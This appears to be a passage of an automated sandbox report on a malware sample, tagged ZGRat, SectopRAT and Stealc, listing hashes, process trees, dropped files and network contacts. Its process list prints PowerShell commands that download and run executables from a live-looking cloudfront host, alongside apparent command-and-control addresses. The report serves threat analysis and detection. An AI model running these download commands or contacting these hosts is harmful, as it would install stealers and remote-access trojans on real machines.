| MD5 | e82ed9131ad46b9025ff978fef4abd59 |
| SHA1 | 8c68caa63d85144b4ff660e3a7b48f8865dd17e9 |
| SHA256 | ccb90805ec961324e7f29e4a1fce8649f757d7e69dbaf4a99b0b9fbbecb64473 |
| SHA512 | af55eedfaf9a2cbe1f6438881ba1553b8267574d49768fcd9ee5ff0a2a1cc828f023f681af62746ac66a16fa28416a3f93239e1bae9861cb1d00681d6bea1270 |
memory/2380-526-0x0000000004CD0000-0x0000000004D10000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1fo.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/1860-544-0x0000000004200000-0x0000000004300000-memory.dmp
memory/1860-543-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2464-545-0x0000000000230000-0x0000000000231000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | b7b3e8a8a18b027b4333feba64524a0a |
| SHA1 | b55d040f683077b446c098bc87e320cde0d82a7a |
| SHA256 | 4877aaefb31817035e386aaa6d0550e4cd0a1a331f694dd0ffbb32a106389f34 |
| SHA512 | 1c7358c1aab01eb891b078ac3d796600009fe0c47c7315a68b064af29bd2d82e1093f8829b23a0ee968ccad558916d2c74f77bfd2cc34149ef25f8ea75c0b561 |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 3668218f4409c4ca5543d108ed16ed29 |
| SHA1 | 88670b8be52cc341c721dd62b7ad36333fd37c5f |
| SHA256 | a1f26152bdb5109ebac832e81c6a1491edec58dfea5af7bf5cc2942b5119a985 |
| SHA512 | 05606270baa6655418df48f28b139a24be9caaf6ff5ed69e47f4431669064e895a3297a8a67b24650adfc750ad37d7567241dabe268352615fe21f678e4b612b |
memory/2464-580-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/812-582-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp
memory/812-583-0x0000000001070000-0x0000000004968000-memory.dmp
memory/812-584-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-585-0x000000001ED20000-0x000000001EE30000-memory.dmp
memory/812-586-0x00000000007C0000-0x00000000007D0000-memory.dmp
memory/812-587-0x0000000000A80000-0x0000000000A8C000-memory.dmp
memory/812-588-0x00000000007D0000-0x00000000007E4000-memory.dmp
memory/812-589-0x0000000000CE0000-0x0000000000D04000-memory.dmp
memory/812-590-0x0000000001060000-0x000000000106A000-memory.dmp
memory/812-591-0x000000001E530000-0x000000001E55A000-memory.dmp
memory/812-592-0x000000001F710000-0x000000001F7C2000-memory.dmp
memory/812-593-0x0000000000B10000-0x0000000000B8A000-memory.dmp
memory/812-594-0x0000000000E90000-0x0000000000EF2000-memory.dmp
memory/812-595-0x0000000000560000-0x000000000056A000-memory.dmp
memory/812-599-0x000000001FDD0000-0x00000000200D0000-memory.dmp
memory/812-601-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-602-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-603-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-604-0x0000000000CC0000-0x0000000000CCA000-memory.dmp
memory/812-605-0x000000001E5B0000-0x000000001E5D2000-memory.dmp
memory/812-609-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-608-0x0000000000CD0000-0x0000000000CDC000-memory.dmp
memory/812-613-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp
memory/812-614-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-616-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-615-0x0000000000580000-0x000000000058A000-memory.dmp
memory/812-617-0x000000001EB20000-0x000000001EBA0000-memory.dmp
memory/812-618-0x000000001EB20000-0x000000001EBA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a156d2ee87eeb3012aacff4fcc5518f7fa0b2caa0b97ad5a5e46c2e4fdf8c5f4\53c051f1d10c489198d14bef4e290887.tmp
| MD5 | 9810559e8ca9cb1e9e1a5222797b7def |
| SHA1 | 0f244940a3f4df18b02a9064f264c8e203cbf885 |
| SHA256 | 7d64187cf73ba0fbf6b691c8dca9f7eb52b557c7da23ecb96f5823189e389955 |
| SHA512 | dda14e433941d72ce88765066159ceb053a7da92ace08dd35dbd9d3ccefda4b9a651c8f42483689e2c49ede3499eb0d8d24f8d60f16675ea0694bb98a3e93ea1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3652 set thread context of 4836 | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 4836 set thread context of 4984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\i1.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 5024
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1016
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
"C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 532
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.15.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.41.65.18.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 210.61.156.108.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| US | 8.8.8.8:53 | 153.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | 76.35.156.94.in-addr.arpa | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| US | 8.8.8.8:53 | 76.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.76.97.176.in-addr.arpa | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| US | 8.8.8.8:53 | 202.125.221.37.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| RU | 91.215.85.66:15647 | | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| FR | 143.244.56.49:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 49.56.244.143.in-addr.arpa | udp |
| RU | 91.215.85.66:15647 | | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | 145.155.9.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsn41DC.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_azlpfouc.lgs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c83cc8b95f9ca9b75499438b45880c2 |
| SHA1 | 8973f5474624292ebccc9c7149d768b739d4df73 |
| SHA256 | e830a032f2cc93e30c235afc1ff7fa095fbccca8305a24ccc909c07d9d5e7af4 |
| SHA512 | 9bb1c97b3b77f6daefa3bf329817673eaded16efe74590cf84a97c4936fc145ee7b7e167722abace83554293b36b6886ecce84f339cd0d211bf976de0a27b7c3 |
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a89739c1fa3a1cbdab8821893a1d2ca8 |
| SHA1 | fe9c5acb5ddceb4027cdce38e1b138f7daa02ef6 |
| SHA256 | c1ef6ddd816078ef2e8cd45a5010fdd62bfbae31c7bb9e4469462033f26605ca |
| SHA512 | e6a837382e0e92cb4276298d6e36360c5c7f14d167c1dfebbabeeabc1f4755e54381f0e0a5406b955162ff7c034cc7b23984d350f67d2c687a13b69328ff15d3 |
C:\Users\Admin\AppData\Local\Temp\u1p4.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e659d112ad5453b1378a4b666ef3681 |
| SHA1 | 825343aca4d67fbb9b195a852f6dc4b6bf001907 |
| SHA256 | 2df426352af89a4120a633cbb5bfc9d1d79f6e0a2afcc7d1fd6d1a85491c271b |
| SHA512 | 2a47aca5be8a5006e7f80ffef2a8def2182aa0b30ddda1f4b81164a436d194343b0e1dcd779a01162c0553e9479724965c4dcab0cc6275b0e0435d70d8662ed2 |
C:\Users\Admin\AppData\Local\Temp\u1p4.1.zip
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
C:\Users\Admin\AppData\Local\Temp\u1p4.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
C:\Users\Admin\AppData\Local\Temp\261c2d90
| MD5 | d16113abda25d68f63c28da6f0f66796 |
| SHA1 | 878ad80612b5a4cd992e6d1e28b13163eb7fcd50 |
| SHA256 | 9cc195a235418dfdb5608f0f311ec8aa957b3c1c08c1e8ac981951bffd587bf1 |
| SHA512 | 9b65dbffb0b03a8b0ccd982c6d9ed14f4b17b9309e247e61717d6b36b125943e6b9e773b17b7614ad9730738c618aa5d1ea9a04b6986d632c90056541558481a |
C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 236
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2348 wrote to memory of 3904 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3904 -ip 3904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 624
Network
